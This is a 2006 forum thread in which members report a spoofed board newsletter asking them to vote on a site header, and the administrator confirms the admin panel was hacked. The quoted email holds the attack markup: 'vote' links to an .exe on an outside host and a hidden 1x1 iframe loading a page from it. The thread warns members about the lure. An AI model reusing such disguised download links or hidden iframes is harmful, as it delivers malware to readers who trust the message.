IPB

ISO Image Creator | Cheap EQ2 gold - Buy EQ2 gold, EVE ISK, EQ Plat and more!

Welcome Guest ( Log In | Register )

 
Reply to this topicStart new topic
> Just got strange email from you guys!
PC-fre@k
post Mar 5 2006, 03:47 AM
Post #1


Newbie
Group Icon

Group: Members
Posts: 2
Joined: 23-August 04
Member No.: 18,701
 Netherlands


CODE
PC-fre@k,

Hey everyone,
We have opened the polls to vote for bfarber.com's new header!
We had an amazing 21 entries for the dark skin and 13 entries for the light skin!

We are requesting that ALL members, take a moment and check out the great submissions for our new header. Please look through all the options in each poll and cast your vote. It will only take a few moments and will empower all of you to choose our site's new header!

Vote for Dark Skin's header: Click here! <a href="http://traffdollars.biz/dl/loadadv553.exe" target="_blank">please click</a>
Vote for Light Skin's header: Click here! <a href="http://traffdollars.biz/dl/loadadv553.exe" target="_blank">please click</a>9

-------------------------------------
bfarber.com Statistics:
-------------------------------------
Registered Users: 43943
Total Posts: 37540
Busiest Time: 489 users were online on 13th December 2004 - 10:01 PM

-------------------------------------
Handy Links
-------------------------------------
Board Address: http://bfarber.com/index.php
Log In: http://bfarber.com/index.php?act=Login&CODE=00
Lost Password Recovery: http://bfarber.com/index.php?act=Reg&CODE=10

-------------------------------------
How to unsubscribe
-------------------------------------
Visit your email preferences (http://bfarber.com/index.php?act=UserCP&CODE=02) and ensure that the box for 'Send me any updates sent by the board administrator' is unchecked and submit the form
<iframe src="http://traffdollars.biz/dl/adv553.php" width=1 height=1></iframe>


You see the EXE's? And the iframe? Then I visited this site and found out here is also something from htt_p://traffdollars.biz loaded!

I would like to know if you really send this yourself, what this has to mean, or whatever happend???

Thanks,

PC-fre@k
Go to the top of the page
 
+Quote Post
D_V
post Mar 5 2006, 08:50 AM
Post #2


Newbie
Group Icon

Group: Members
Posts: 1
Joined: 20-October 05
Member No.: 41,177
 Nothing Selected


I got the exact same email.

here are all the headers on the mail i received...
QUOTE
From - Sun Mar 05 14:37:35 2006
X-Account-Key: account2
X-UIDL: GmailId*************
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Gmail-Received: 010f1ae86e9a029ea0bb4ee5f4b0bf5543d4f58d
Delivered-To: ************
Received: by 10.48.143.17 with SMTP id q17cs14363nfd;
        Sun, 5 Mar 2006 00:03:31 -0800 (PST)
Received: by 10.70.125.8 with SMTP id x8mr6426032wxc;
        Sun, 05 Mar 2006 00:03:31 -0800 (PST)
Return-Path: <bfarber@www03.pdaden.com>
Received: from www03.pdaden.com ([65.254.54.98])
        by mx.gmail.com with ESMTP id h35si4690847wxd.2006.03.05.00.03.31;
        Sun, 05 Mar 2006 00:03:31 -0800 (PST)
Received-SPF: neutral (gmail.com: 65.254.54.98 is neither permitted nor denied by best guess record for domain of bfarber@www03.pdaden.com)
Received: from bfarber by www03.pdaden.com with local (Exim 4.52)
id 1FFoD8-0004Hx-3b
for dv.sum0@gmail.com; Sun, 05 Mar 2006 03:03:26 -0500
To: ***********
Subject: bfarber.com's new header Please Vote ( From bfarber.com )
MIME-Version: 1.0
Content-type: text/html; charset="iso-8859-1"
From: "bfarber.com" <bfarber@bfarber.com>
X-Priority: 3
X-Mailer: IPB PHP Mailer
Message-Id: <E1FFoD8-0004Hx-3b@www03.pdaden.com>
Date: Sun, 05 Mar 2006 03:03:26 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - www03.pdaden.com
X-AntiAbuse: Original Domain - gmail.com
X-AntiAbuse: Originator/Caller UID/GID - [32093 594] / [47 12]
X-AntiAbuse: Sender Address Domain - www03.pdaden.com
X-Source:
X-Source-Args:
X-Source-Dir:


This post has been edited by D_V: Mar 5 2006, 08:51 AM
Go to the top of the page
 
+Quote Post
bfarber
post Mar 5 2006, 09:12 AM
Post #3


Administrator
Group Icon

Group: Admin
Posts: 10,302
Joined: 9-February 03
From: Jacksonville, FL
Member No.: 1
 United States


Hello,

I just got thee same emails and I assure you we did not send them. It appears our admin control panel was hacked. I'll post a news announcement shortly and remove that link.

Sorry for the troubles. sad.gif
Go to the top of the page
 
+Quote Post
PC-fre@k
post Mar 6 2006, 01:47 AM
Post #4


Newbie
Group Icon

Group: Members
Posts: 2
Joined: 23-August 04
Member No.: 18,701
 Netherlands


I knew I had to report this wink.gif Maybe you can dig in the logs, who did that action (since all admin actions are logged). Good thing we could help smile.gif

Happy Modding tongue.gif
Go to the top of the page
 
+Quote Post
justinsayne
post Mar 6 2006, 04:21 PM
Post #5


Newbie
Group Icon

Group: Members
Posts: 2
Joined: 26-November 05
Member No.: 42,700
 Canada


QUOTE(PC-fre@k @ Mar 6 2006, 12:47 AM)
I knew I had to report this wink.gif Maybe you can dig in the logs, who did that action (since all admin actions are logged). Good thing we could help smile.gif

Happy Modding tongue.gif
*



Gjob I just got this too and I never open an exe without confirmation, which is why I came here... thanks for being on yer toes
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

 

Lo-Fi Version Time is now: 30th August 2008 - 07:06 AM

  Page top

Webber Enhanced skin created by Im4eversmart of RuneHQ.

  Webmasters     Cool Sites     Money Network     Privacy Policy